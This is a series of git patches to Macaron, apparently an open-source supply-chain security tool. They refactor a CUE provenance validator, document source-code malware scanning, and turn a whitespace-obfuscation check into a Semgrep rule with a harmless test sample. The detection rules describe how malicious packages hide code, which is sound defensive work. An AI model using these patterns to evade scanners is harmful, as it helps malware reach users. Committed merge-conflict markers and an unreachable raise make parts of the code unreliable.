a/src/macaron/slsa_analyzer/provenance/expectations/cue/cue_validator.py b/src/macaron/slsa_analyzer/provenance/expectations/cue/cue_validator.py index 70e203af8..fc7e92c1b 100644 --- a/src/macaron/slsa_analyzer/provenance/expectations/cue/cue_validator.py +++ b/src/macaron/slsa_analyzer/provenance/expectations/cue/cue_validator.py @@ -1,28 +1,23 @@ -# Copyright (c) 2023 - 2024, Oracle and/or its affiliates. All rights reserved. +# Copyright (c) 2023 - 2025, Oracle and/or its affiliates. All rights reserved. # Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. """The cue module invokes the CUE schema validator.""" -import ctypes -import json import os -from collections.abc import Callable +import subprocess # nosec B404 from macaron import MACARON_PATH +from macaron.config.defaults import defaults from macaron.errors import CUEExpectationError, CUERuntimeError -from macaron.json_tools import JsonType -# Load the CUE shared library. -cue = ctypes.CDLL(os.path.join(MACARON_PATH, "bin", "cuevalidate.so")) - -def get_target(expectation: str | None) -> str: +def get_target(expectation_path: str | None) -> str: """Get the analysis target of the expectation. Parameters ---------- - expectation: str | None - The cue expectation content. + expectation_path: str | None + The cue expectation path. Returns ------- @@ -34,42 +29,45 @@ def get_target(expectation: str | None) -> str: CUERuntimeError, CUEExpectationError If expectation is invalid or unable to get the target by invoking the shared library. 
""" - if not expectation: - raise CUEExpectationError("CUE expectation is empty.") - - cue.target.restype = ctypes.c_void_p - - def _errcheck( - result: ctypes.c_void_p, func: Callable, args: tuple # pylint: disable=unused-argument - ) -> ctypes.c_void_p: - if not result: - raise CUERuntimeError("Unable to find target field in CUE expectation.") - return result - - cue.target.errcheck = _errcheck # type: ignore - expectation_buffer = ctypes.create_string_buffer(bytes(expectation, encoding="utf-8")) - target_ptr = cue.target(expectation_buffer) - res_bytes = ctypes.string_at(target_ptr) - - # Even though Python & Go have a garbage collector that will free up unused memory, - # the documentation says it is the caller's responsibility to free up the C string - # allocated memory. See https://pkg.go.dev/cmd/cgo - free = cue.free - free.argtypes = [ctypes.c_void_p] - free(target_ptr) - - return res_bytes.decode("utf-8") - - -def validate_expectation(expectation: str | None, prov: JsonType) -> bool: + if not expectation_path: + raise CUEExpectationError("CUE expectation path is not provided.") + + cmd = [ + os.path.join(MACARON_PATH, "bin", "cuevalidator"), + "-target-policy", + expectation_path, + ] + + try: + result = subprocess.run( # nosec B603 + cmd, + capture_output=True, + check=True, + cwd=MACARON_PATH, + timeout=defaults.getint("cue_validator", "timeout", fallback=30), + ) + except ( + subprocess.CalledProcessError, + subprocess.TimeoutExpired, + FileNotFoundError, + ) as error: + raise CUERuntimeError("Unable to process CUE expectation.") from error + + if result.returncode == 0: + return result.stdout.decode("utf-8") + + raise CUEExpectationError("Unable to find target field in CUE expectation.") + + +def validate_expectation(expectation_path: str, prov_stmt_path: str) -> bool: """Validate a json document against a cue expectation. Parameters ---------- - expectation: str | None - The cue expectation content. - prov: JsonType - The provenance payload. 
+ expectation_path: str + The cue expectation path. + prov_stmt_path: str + The provenance statement path. Returns ------- @@ -78,20 +76,36 @@ def validate_expectation(expectation: str | None, prov: JsonType) -> bool: Raises ------ - CUERuntimeError, CUEExpectationError + CUERuntimeError If expectation is invalid or unable to validate the expectation by invoking the shared library. """ - if not expectation: - raise CUEExpectationError("CUE policies is empty.") - - expectation_buffer = ctypes.create_string_buffer(bytes(expectation, encoding="utf-8")) - prov_buffer = ctypes.create_string_buffer(bytes(json.dumps(prov), encoding="utf-8")) - - def _errcheck(result: int, func: Callable, args: tuple) -> int: # pylint: disable=unused-argument - if result == -1: - raise CUERuntimeError("Unable to validate the CUE expectation") - return result - - cue.target.errcheck = _errcheck # type: ignore - result = bool(cue.validate(expectation_buffer, prov_buffer)) - return result + cmd = [ + os.path.join(MACARON_PATH, "bin", "cuevalidator"), + "-validate-policy", + expectation_path, + "-validate-provenance", + prov_stmt_path, + ] + + try: + result = subprocess.run( # nosec B603 + cmd, + capture_output=True, + check=True, + cwd=MACARON_PATH, + timeout=defaults.getint("cue_validator", "timeout", fallback=30), + ) + except ( + subprocess.CalledProcessError, + subprocess.TimeoutExpired, + FileNotFoundError, + ) as error: + raise CUERuntimeError("Unable to process CUE expectation or provenance.") from error + + if result.returncode == 0: + if result.stdout.decode("utf-8") == "True": + return True + if result.stdout.decode("utf-8") == "False": + return False + + raise CUERuntimeError("Something unexpected happened while validating the provenance against CUE expectation.") diff --git a/src/macaron/slsa_analyzer/provenance/expectations/expectation.py b/src/macaron/slsa_analyzer/provenance/expectations/expectation.py index 093ba6625..69dc56df9 100644 --- 
a/src/macaron/slsa_analyzer/provenance/expectations/expectation.py
+++ b/src/macaron/slsa_analyzer/provenance/expectations/expectation.py
@@ -1,8 +1,10 @@
-# Copyright (c) 2023 - 2024, Oracle and/or its affiliates. All rights reserved.
+# Copyright (c) 2023 - 2025, Oracle and/or its affiliates. All rights reserved.
 # Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/.
 
 """This module provides a base class for provenance expectation verifiers."""
 
+import json
+import tempfile
 from abc import abstractmethod
 from collections.abc import Callable
 from typing import Any, Self
@@ -89,6 +91,12 @@ def validate(self, prov: InTotoPayload) -> bool:
             If there are errors happened during the validation process.
         """
         if not self._validator:
-            raise ExpectationRuntimeError(f"Cannot find the validator for expectation {self.path}")
+            raise ExpectationRuntimeError(f"Unable to find the validator for expectation {self.path}")
 
-        return self._validator(prov.statement)  # pylint: disable=not-callable
+        with tempfile.NamedTemporaryFile(suffix=".json", mode="w+", delete=True) as prov_stmt_file:
+            prov_stmt_file.write(json.dumps(prov.statement))
+            # Rewind the file pointer before reading.
+            prov_stmt_file.seek(0)
+            return self._validator(prov_stmt_file.name)  # pylint: disable=not-callable
+
+            raise ExpectationRuntimeError("Unable to validate the expectation.")
diff --git a/tests/slsa_analyzer/provenance/expectations/cue/test_cue_validator.py b/tests/slsa_analyzer/provenance/expectations/cue/test_cue_validator.py
index 71aa0b793..207b05fd2 100644
--- a/tests/slsa_analyzer/provenance/expectations/cue/test_cue_validator.py
+++ b/tests/slsa_analyzer/provenance/expectations/cue/test_cue_validator.py
@@ -1,14 +1,14 @@
-# Copyright (c) 2023 - 2024, Oracle and/or its affiliates. All rights reserved.
+# Copyright (c) 2023 - 2025, Oracle and/or its affiliates. All rights reserved.
# Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. """This module tests the CUE expectation validator.""" -import json import os from pathlib import Path import pytest +from macaron.errors import CUERuntimeError from macaron.slsa_analyzer.provenance.expectations.cue import CUEExpectation from macaron.slsa_analyzer.provenance.expectations.cue.cue_validator import get_target, validate_expectation @@ -37,16 +37,23 @@ def test_make_expectation(expectation_path: str) -> None: ("expectation_path", "expected"), [ (os.path.join(EXPECT_RESOURCE_PATH, "valid_expectations", "urllib3_PASS.cue"), PACKAGE_URLLIB3), - (os.path.join(EXPECT_RESOURCE_PATH, "valid_expectations", "urllib3_FAIL.cue"), ""), ], ) def test_get_target(expectation_path: str, expected: str) -> None: """Test getting target from valid CUE expectations.""" - expectation = CUEExpectation.make_expectation(expectation_path=expectation_path) - if expectation: - assert get_target(expectation.text) == expected - else: - raise ValueError("Expected a valid expectation.") + assert get_target(expectation_path) == expected + + +@pytest.mark.parametrize( + "expectation_path", + [ + os.path.join(EXPECT_RESOURCE_PATH, "valid_expectations", "urllib3_FAIL.cue"), + ], +) +def test_no_target(expectation_path: str) -> None: + """Test getting target from valid CUE expectations that misses a target.""" + with pytest.raises(CUERuntimeError): + get_target(expectation_path) @pytest.mark.parametrize( @@ -76,10 +83,4 @@ def test_get_target(expectation_path: str, expected: str) -> None: ) def test_validate_expectation(expectation_path: str, prov_path: str, expected: bool) -> None: """Test validating CUE expectations against provenances.""" - expectation = CUEExpectation.make_expectation(expectation_path=expectation_path) - if expectation: - with open(prov_path, encoding="utf-8") as prov_file: - provenance = json.load(prov_file) - assert validate_expectation(expectation.text, 
provenance) == expected - else: - raise ValueError("Expected a valid expectation.") + assert validate_expectation(expectation_path, prov_path) == expected From 540cf2de1ca395812cb0ab87645a68c1538eb38b Mon Sep 17 00:00:00 2001 From: Carl Flottmann Date: Thu, 12 Jun 2025 13:34:27 +1000 Subject: [PATCH 08/14] fix: include inspector links with information on if they are reachable. (#1102) The detail info containing inspector links now contains links as keys regardless of whether they are reachable, and includes a boolean value for reachability. Signed-off-by: Carl Flottmann --- .../pypi_heuristics/metadata/wheel_absence.py | 10 +++++----- tests/malware_analyzer/pypi/test_wheel_absence.py | 6 +++--- 2 files changed, 8 insertions(+), 8 deletions(-) diff --git a/src/macaron/malware_analyzer/pypi_heuristics/metadata/wheel_absence.py b/src/macaron/malware_analyzer/pypi_heuristics/metadata/wheel_absence.py index 3a3033e22..0198a932d 100644 --- a/src/macaron/malware_analyzer/pypi_heuristics/metadata/wheel_absence.py +++ b/src/macaron/malware_analyzer/pypi_heuristics/metadata/wheel_absence.py @@ -70,7 +70,8 @@ def analyze(self, pypi_package_json: PyPIPackageJsonAsset) -> tuple[HeuristicRes logger.debug(error_msg) raise HeuristicAnalyzerValueError(error_msg) - inspector_links: list[JsonType] = [] + # Contains a boolean field identifying if the link is reachable by this Macaron instance or not. 
+ inspector_links: dict[str, JsonType] = {} wheel_present: bool = False release_distributions = json_extract(releases, [version], list) @@ -120,10 +121,9 @@ def analyze(self, pypi_package_json: PyPIPackageJsonAsset) -> tuple[HeuristicRes ) # use a head request because we don't care about the response contents - if send_head_http_raw(inspector_link) is None: - inspector_links.append(None) - else: - inspector_links.append(inspector_link) + inspector_links[inspector_link] = False + if send_head_http_raw(inspector_link): + inspector_links[inspector_link] = True # link was reachable detail_info: dict[str, JsonType] = { "inspector_links": inspector_links, diff --git a/tests/malware_analyzer/pypi/test_wheel_absence.py b/tests/malware_analyzer/pypi/test_wheel_absence.py index 3cfccfbe7..b79df0b7f 100644 --- a/tests/malware_analyzer/pypi/test_wheel_absence.py +++ b/tests/malware_analyzer/pypi/test_wheel_absence.py @@ -75,7 +75,7 @@ def test_analyze_tar_present(mock_send_head_http_raw: MagicMock, pypi_package_js mock_send_head_http_raw.return_value = MagicMock() # assume valid URL for testing purposes expected_detail_info = { - "inspector_links": [inspector_link_expected], + "inspector_links": {inspector_link_expected: True}, } expected_result: tuple[HeuristicResult, dict] = (HeuristicResult.FAIL, expected_detail_info) @@ -134,7 +134,7 @@ def test_analyze_whl_present(mock_send_head_http_raw: MagicMock, pypi_package_js mock_send_head_http_raw.return_value = MagicMock() # assume valid URL for testing purposes expected_detail_info = { - "inspector_links": [inspector_link_expected], + "inspector_links": {inspector_link_expected: True}, } expected_result: tuple[HeuristicResult, dict] = (HeuristicResult.PASS, expected_detail_info) @@ -222,7 +222,7 @@ def test_analyze_both_present(mock_send_head_http_raw: MagicMock, pypi_package_j mock_send_head_http_raw.return_value = MagicMock() # assume valid URL for testing purposes expected_detail_info = { - "inspector_links": 
[wheel_link_expected, tar_link_expected], + "inspector_links": {wheel_link_expected: True, tar_link_expected: True}, } expected_result: tuple[HeuristicResult, dict] = (HeuristicResult.PASS, expected_detail_info) From d943e7b115d15db5a0eebb334cb3b026b6402e73 Mon Sep 17 00:00:00 2001 From: Carl Flottmann Date: Fri, 13 Jun 2025 09:46:34 +1000 Subject: [PATCH 09/14] docs: include source code analysis subsection in malicious package tutorial (#1101) Signed-off-by: Carl Flottmann --- docs/source/pages/cli_usage/command_analyze.rst | 7 +++++++ .../pages/tutorials/detect_malicious_package.rst | 16 ++++++++++++++++ 2 files changed, 23 insertions(+) diff --git a/docs/source/pages/cli_usage/command_analyze.rst b/docs/source/pages/cli_usage/command_analyze.rst index a04f88bd2..e5fa9b1db 100644 --- a/docs/source/pages/cli_usage/command_analyze.rst +++ b/docs/source/pages/cli_usage/command_analyze.rst @@ -84,6 +84,13 @@ Options Allow the analysis to attempt to verify provenance files as part of its normal operations. +.. option:: --force-analyze-source + + Forces PyPI sourcecode analysis to run regardless of other heuristic results. Requires '--analyze-source'. + +.. option:: --analyze-source + + For improved malware detection, analyze the source code of the (PyPI) package using a textual scan and dataflow analysis. ----------- Environment diff --git a/docs/source/pages/tutorials/detect_malicious_package.rst b/docs/source/pages/tutorials/detect_malicious_package.rst index 22c236700..907d7827a 100644 --- a/docs/source/pages/tutorials/detect_malicious_package.rst +++ b/docs/source/pages/tutorials/detect_malicious_package.rst @@ -122,6 +122,22 @@ Note that the ``match`` constraint applies a regex pattern and can be expanded t is_component(component_id, purl), match("pkg:pypi.*", purl). +'''''''''''''''''''' +Source Code Analysis +'''''''''''''''''''' + +.. note:: This is a new feature recently added to Macaron. 
+
+Macaron supports static code analysis as a malware analysis heuristic. This can be enabled by supplying the command line argument ``--analyze-source``. Macaron uses the open-source static code analysis tool Semgrep to analyze the source code of a Python package, looking for malicious code patterns defined in Macaron's own Semgrep rules. Example detection patterns include identifying attempts to obfuscate source code and detecting code that exfiltrates sensitive data to remote connections.
+
+By default, the source code analyzer is run in conjunction with the other metadata heuristics. The source code heuristic is optimized such that it is not always required to be run to ensure a package is benign, so it will not always be run as part of the heuristic analysis, even when enabled. To force it to run regardless of the result of other heuristics, the command line argument ``--force-analyze-source`` must be supplied. To analyze ``django@5.0.6`` with source code analysis enabled and enforced, the following command may be run:
+
+.. code-block:: shell
+
+   ./run_macaron.sh analyze -purl pkg:pypi/django@5.0.6 --python-venv "/tmp/.django_venv" --analyze-source --force-analyze-source
+
+If any suspicious patterns are triggered, this will be identified in the ``mcn_detect_malicious_metadata_1`` result for the heuristic named ``suspicious_patterns``. The output database ``output/macaron.db`` can be used to get the specific results of the analysis by querying the :class:`detect_malicious_metadata_check.result field `. This will provide detailed JSON information about all data collected by the ``mcn_detect_malicious_metadata_1`` check, including, for source code analysis, any malicious code patterns detected, what Semgrep rule detected it, the file in which it was detected, and the line number for the detection.
+ +++++++++++++++++++++++++++++++++++++++ Verification Summary Attestation report +++++++++++++++++++++++++++++++++++++++ From f28a8cdc5301249377d047831385a9d6140e3fcc Mon Sep 17 00:00:00 2001 From: Raouane Amine Date: Fri, 13 Jun 2025 04:04:50 +0100 Subject: [PATCH 10/14] fix(pypi): update get_maintainers_of_package to avoid request blocking (#1097) Signed-off-by: Amine --- src/macaron/slsa_analyzer/package_registry/pypi_registry.py | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/src/macaron/slsa_analyzer/package_registry/pypi_registry.py b/src/macaron/slsa_analyzer/package_registry/pypi_registry.py index 13156f7f7..f0cfcfbc3 100644 --- a/src/macaron/slsa_analyzer/package_registry/pypi_registry.py +++ b/src/macaron/slsa_analyzer/package_registry/pypi_registry.py @@ -320,7 +320,8 @@ def get_package_page(self, package_name: str) -> str | None: str | None The package main page. """ - url = os.path.join(self.registry_url, "project", package_name) + # Important: trailing '/' avoids JS-based redirect; ensures Macaron can access the page directly + url = urllib.parse.urljoin(self.registry_url, f"project/{package_name}/") response = send_get_http_raw(url) if response: html_snippets = response.content.decode("utf-8") @@ -360,7 +361,8 @@ def get_maintainer_profile_page(self, username: str) -> str | None: str | None The profile page. 
""" - url = os.path.join(self.registry_url, "user", username) + # Important: trailing '/' avoids JS-based redirect; ensures Macaron can access the page directly + url = urllib.parse.urljoin(self.registry_url, f"user/{username}/") response = send_get_http_raw(url, headers=None) if response: html_snippets = response.content.decode("utf-8") From c2b016a8f60e946f75b2b0696b30e0ff1db002ad Mon Sep 17 00:00:00 2001 From: Amine Date: Mon, 19 May 2025 19:33:06 +0100 Subject: [PATCH 11/14] feat(heuristics): add Whitespace Check to detect excessive spacing and invisible characters Signed-off-by: Amine --- .../pypi_heuristics/sourcecode/white_spaces.py | 9 ++------- 1 file changed, 2 insertions(+), 7 deletions(-) diff --git a/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/white_spaces.py b/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/white_spaces.py index 0807afd80..16521dba6 100644 --- a/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/white_spaces.py +++ b/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/white_spaces.py @@ -48,16 +48,11 @@ def _load_defaults(self) -> int: The repeated spaces threshold. """ section_name = "heuristic.pypi" - default_threshold = 50 - if defaults.has_section(section_name): section = defaults[section_name] - value_str = section.get("repeated_spaces_threshold", fallback=str(default_threshold)) - if value_str is not None and value_str.isdigit(): - return int(value_str) - return default_threshold + return section.getint("repeated_spaces_threshold", 50) - return default_threshold + return 50 def analyze(self, pypi_package_json: PyPIPackageJsonAsset) -> tuple[HeuristicResult, dict[str, JsonType]]: """Analyze the package. 
From 2cbfd7b343ad65e1e6b87812a5c3523eda87de62 Mon Sep 17 00:00:00 2001 From: Amine Date: Mon, 26 May 2025 10:51:13 +0100 Subject: [PATCH 12/14] chore: add config variable to defaults.ini and minor cleanup Signed-off-by: Amine --- .gitignore | 4 ++++ .../pypi_heuristics/sourcecode/white_spaces.py | 9 +++++++-- 2 files changed, 11 insertions(+), 2 deletions(-) diff --git a/.gitignore b/.gitignore index 4893a7151..4fd45e91a 100644 --- a/.gitignore +++ b/.gitignore @@ -182,7 +182,11 @@ bin/ requirements.txt .macaron_env_file <<<<<<< HEAD +<<<<<<< HEAD .DS_Store ======= **/.DS_Store >>>>>>> 1c65d5f (feat(security): add package name typosquatting detection (#1059)) +======= +.DS_Store +>>>>>>> caddb2a (chore: add config variable to defaults.ini and minor cleanup) diff --git a/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/white_spaces.py b/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/white_spaces.py index 16521dba6..0807afd80 100644 --- a/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/white_spaces.py +++ b/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/white_spaces.py @@ -48,11 +48,16 @@ def _load_defaults(self) -> int: The repeated spaces threshold. """ section_name = "heuristic.pypi" + default_threshold = 50 + if defaults.has_section(section_name): section = defaults[section_name] - return section.getint("repeated_spaces_threshold", 50) + value_str = section.get("repeated_spaces_threshold", fallback=str(default_threshold)) + if value_str is not None and value_str.isdigit(): + return int(value_str) + return default_threshold - return 50 + return default_threshold def analyze(self, pypi_package_json: PyPIPackageJsonAsset) -> tuple[HeuristicResult, dict[str, JsonType]]: """Analyze the package. 
From 697106a48cf410e6389e8e610d4a011b92bba229 Mon Sep 17 00:00:00 2001 From: Amine Date: Tue, 17 Jun 2025 16:17:45 +0100 Subject: [PATCH 13/14] feat(heuristics): add Whitespace Check to Semgrep Signed-off-by: Amine --- .../sourcecode/white_spaces.py | 103 ------------------ .../pypi_malware_rules/obfuscation.yaml | 9 ++ .../checks/detect_malicious_metadata_check.py | 1 - .../obfuscation/excessive_spacing.py | 25 +++++ .../obfuscation/expected_results.json | 15 +++ .../obfuscation/inline_imports.py | 2 +- .../pypi/test_white_spaces.py | 70 ------------ 7 files changed, 50 insertions(+), 175 deletions(-) delete mode 100644 src/macaron/malware_analyzer/pypi_heuristics/sourcecode/white_spaces.py create mode 100644 tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/excessive_spacing.py delete mode 100644 tests/malware_analyzer/pypi/test_white_spaces.py diff --git a/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/white_spaces.py b/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/white_spaces.py deleted file mode 100644 index 0807afd80..000000000 --- a/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/white_spaces.py +++ /dev/null @@ -1,103 +0,0 @@ -# Copyright (c) 2024 - 2025, Oracle and/or its affiliates. All rights reserved. -# Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. 
- -"""This analyzer checks if the package has white spaces or invisible characters in the code.""" - -import logging -import re - -from macaron.config.defaults import defaults -from macaron.json_tools import JsonType -from macaron.malware_analyzer.pypi_heuristics.base_analyzer import BaseHeuristicAnalyzer -from macaron.malware_analyzer.pypi_heuristics.heuristics import HeuristicResult, Heuristics -from macaron.slsa_analyzer.package_registry.pypi_registry import PyPIPackageJsonAsset - -logger: logging.Logger = logging.getLogger(__name__) - - -class WhiteSpacesAnalyzer(BaseHeuristicAnalyzer): - """Check whether the code has successive white spaces or invisible characters.""" - - INVISIBLE_CHARS = [ - "\u200b", - "\u200c", - "\u200d", - "\ufeff", - "\u200e", - "\u200f", - "\u00a0", - "\u00ad", - " ", - ] - - def __init__(self) -> None: - super().__init__( - name="white_spaces_analyzer", - heuristic=Heuristics.WHITE_SPACES, - depends_on=None, - ) - - self.repeated_spaces_threshold = self._load_defaults() - - def _load_defaults(self) -> int: - """Load default settings from defaults.ini. - - Returns - ------- - int: - The repeated spaces threshold. - """ - section_name = "heuristic.pypi" - default_threshold = 50 - - if defaults.has_section(section_name): - section = defaults[section_name] - value_str = section.get("repeated_spaces_threshold", fallback=str(default_threshold)) - if value_str is not None and value_str.isdigit(): - return int(value_str) - return default_threshold - - return default_threshold - - def analyze(self, pypi_package_json: PyPIPackageJsonAsset) -> tuple[HeuristicResult, dict[str, JsonType]]: - """Analyze the package. - - Parameters - ---------- - pypi_package_json: PyPIPackageJsonAsset - The PyPI package JSON asset object. - - Returns - ------- - tuple[HeuristicResult, dict[str, JsonType]]: - The result and related information collected during the analysis. 
- """ - scripts: dict[str, str] | None = pypi_package_json.get_sourcecode() - if scripts is None: - return HeuristicResult.SKIP, {} - - for file, content in scripts.items(): - if file.endswith(".py") and self.has_white_spaces(content): - return HeuristicResult.FAIL, { - "file": file, - } - return HeuristicResult.PASS, {} - - def has_white_spaces(self, code_string: str) -> bool: - """Check for excessive or invisible whitespace characters in a code string. - - Parameters - ---------- - code_string: str - The code string to check. - - Returns - ------- - bool: - True if suspicious patterns are found, False otherwise. - """ - char_class = "".join(self.INVISIBLE_CHARS) - regex_pattern = f"[{char_class}]{{{self.repeated_spaces_threshold},}}" - if re.search(regex_pattern, code_string, re.DOTALL): - return True - return False diff --git a/src/macaron/resources/pypi_malware_rules/obfuscation.yaml b/src/macaron/resources/pypi_malware_rules/obfuscation.yaml index 6d6ea066b..12b164614 100644 --- a/src/macaron/resources/pypi_malware_rules/obfuscation.yaml +++ b/src/macaron/resources/pypi_malware_rules/obfuscation.yaml @@ -311,3 +311,12 @@ rules: - pattern: os.writev(...) - pattern: os.pwrite(...) - pattern: os.pwritev(...) + +- id: obfuscation_excessive-spacing + metadata: + description: Detects the use of excessive spacing in code, which may indicate obfuscation or hidden code. 
+ message: Hidden code after excessive spacing + languages: + - python + severity: WARNING + pattern-regex: ' {50,}[^ ]+' diff --git a/src/macaron/slsa_analyzer/checks/detect_malicious_metadata_check.py b/src/macaron/slsa_analyzer/checks/detect_malicious_metadata_check.py index 80a53d610..c9c44ae7c 100644 --- a/src/macaron/slsa_analyzer/checks/detect_malicious_metadata_check.py +++ b/src/macaron/slsa_analyzer/checks/detect_malicious_metadata_check.py @@ -28,7 +28,6 @@ from macaron.malware_analyzer.pypi_heuristics.metadata.wheel_absence import WheelAbsenceAnalyzer from macaron.malware_analyzer.pypi_heuristics.sourcecode.pypi_sourcecode_analyzer import PyPISourcecodeAnalyzer from macaron.malware_analyzer.pypi_heuristics.sourcecode.suspicious_setup import SuspiciousSetupAnalyzer -from macaron.malware_analyzer.pypi_heuristics.sourcecode.white_spaces import WhiteSpacesAnalyzer from macaron.slsa_analyzer.analyze_context import AnalyzeContext from macaron.slsa_analyzer.checks.base_check import BaseCheck from macaron.slsa_analyzer.checks.check_result import CheckResultData, CheckResultType, Confidence, JustificationType diff --git a/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/excessive_spacing.py b/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/excessive_spacing.py new file mode 100644 index 000000000..22ea38a6f --- /dev/null +++ b/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/excessive_spacing.py @@ -0,0 +1,25 @@ +# Copyright (c) 2025 - 2025, Oracle and/or its affiliates. All rights reserved. +# Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. + +""" +Running this code will not produce any malicious behavior, but code isolation measures are +in place for safety. 
+""" + +import sys + +# ensure no symbols are exported so this code cannot accidentally be used +__all__ = [] +sys.exit() + +def test_function(): + """ + All code to be tested will be defined inside this function, so it is all local to it. This is + to isolate the code to be tested, as it exists to replicate the patterns present in malware + samples. + """ + sys.exit() + + # excessive spacing obfuscation + def excessive_spacing_flow(): + print("Hello world!") diff --git a/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/expected_results.json b/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/expected_results.json index aabf72e18..218c6acbe 100644 --- a/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/expected_results.json +++ b/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/expected_results.json @@ -229,6 +229,21 @@ "end": 68 } ] + }, + "src.macaron.resources.pypi_malware_rules.obfuscation_excessive-spacing": { + "message": "Hidden code after excessive spacing", + "detections": [ + { + "file": "obfuscation/excessive_spacing.py", + "start": 25, + "end": 25 + }, + { + "file": "obfuscation/inline_imports.py", + "start": 27, + "end": 28 + } + ] } }, "disabled_sourcecode_rule_findings": {} diff --git a/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/inline_imports.py b/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/inline_imports.py index 80e006781..4e37c7c02 100644 --- a/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/inline_imports.py +++ b/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/inline_imports.py @@ -24,7 +24,7 @@ def test_function(): __import__('builtins') __import__('subprocess') __import__('sys') - __import__('os') + print("Hello world!") ;__import__('os') __import__('zlib') __import__('marshal') # these both just import builtins diff --git a/tests/malware_analyzer/pypi/test_white_spaces.py 
b/tests/malware_analyzer/pypi/test_white_spaces.py deleted file mode 100644 index 500ef00b5..000000000 --- a/tests/malware_analyzer/pypi/test_white_spaces.py +++ /dev/null @@ -1,70 +0,0 @@ -# Copyright (c) 2024 - 2025, Oracle and/or its affiliates. All rights reserved. -# Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. - -"""Tests for the WhiteSpacesAnalyzer heuristic.""" -# pylint: disable=redefined-outer-name - - -from unittest.mock import MagicMock - -import pytest - -from macaron.malware_analyzer.pypi_heuristics.heuristics import HeuristicResult -from macaron.malware_analyzer.pypi_heuristics.sourcecode.white_spaces import WhiteSpacesAnalyzer - - -@pytest.fixture() -def analyzer() -> WhiteSpacesAnalyzer: - """Pytest fixture to create a WhiteSpacesAnalyzer instance.""" - analyzer_instance = WhiteSpacesAnalyzer() - return analyzer_instance - - -def test_analyze_no_sourcecode(analyzer: WhiteSpacesAnalyzer, pypi_package_json: MagicMock) -> None: - """Test the analyzer skips when there is no source code.""" - pypi_package_json.get_sourcecode.return_value = None - result, info = analyzer.analyze(pypi_package_json) - assert result == HeuristicResult.SKIP - assert info == {} - - -def test_analyze_pass(analyzer: WhiteSpacesAnalyzer, pypi_package_json: MagicMock) -> None: - """Test the analyzer passes when no suspicious whitespace is found.""" - pypi_package_json.get_sourcecode.return_value = {"test.py": "print('hello')"} - result, info = analyzer.analyze(pypi_package_json) - assert result == HeuristicResult.PASS - assert info == {} - - -def test_analyze_fail_long_spaces(analyzer: WhiteSpacesAnalyzer, pypi_package_json: MagicMock) -> None: - """Test the analyzer fails when long spaces are found.""" - repeated_spaces_threshold = analyzer.repeated_spaces_threshold - code = f"print('hello')\n{' ' * (repeated_spaces_threshold + 1)}print('world')" - pypi_package_json.get_sourcecode.return_value = {"test.py": code} - 
result, info = analyzer.analyze(pypi_package_json) - assert result == HeuristicResult.FAIL - assert info["file"] == "test.py" - - -def test_analyze_fail_invisible_chars(analyzer: WhiteSpacesAnalyzer, pypi_package_json: MagicMock) -> None: - """Test the analyzer fails when invisible characters are found.""" - repeated_spaces_threshold = analyzer.repeated_spaces_threshold - invisible_char = "\u200b" # Zero-width space. - code = f"print('hello'){invisible_char * repeated_spaces_threshold}print('world')" - pypi_package_json.get_sourcecode.return_value = {"test.py": code} - result, info = analyzer.analyze(pypi_package_json) - assert result == HeuristicResult.FAIL - assert info["file"] == "test.py" - - -def test_has_white_spaces_long_spaces(analyzer: WhiteSpacesAnalyzer) -> None: - """Test has_white_spaces method with long spaces.""" - repeated_spaces_threshold = analyzer.repeated_spaces_threshold - code = f"print('hello')\n{' ' * repeated_spaces_threshold}print('world')" - assert analyzer.has_white_spaces(code) - - -def test_has_white_spaces_no_suspicious(analyzer: WhiteSpacesAnalyzer) -> None: - """Test has_white_spaces method with no suspicious whitespace.""" - code = "print('hello')\nprint('world')" - assert not analyzer.has_white_spaces(code) From a62851ebd8db0c700a24b2ea697676078359ea17 Mon Sep 17 00:00:00 2001 From: Amine Date: Mon, 23 Jun 2025 23:29:31 +0100 Subject: [PATCH 14/14] refactor(semgrep): update excessive spacing regex and clarify obfuscation threshold Signed-off-by: Amine --- src/macaron/resources/pypi_malware_rules/obfuscation.yaml | 3 ++- .../sourcecode_samples/obfuscation/expected_results.json | 4 ++-- 2 files changed, 4 insertions(+), 3 deletions(-) diff --git a/src/macaron/resources/pypi_malware_rules/obfuscation.yaml b/src/macaron/resources/pypi_malware_rules/obfuscation.yaml index 12b164614..6071d2157 100644 --- a/src/macaron/resources/pypi_malware_rules/obfuscation.yaml +++ b/src/macaron/resources/pypi_malware_rules/obfuscation.yaml @@ -319,4 
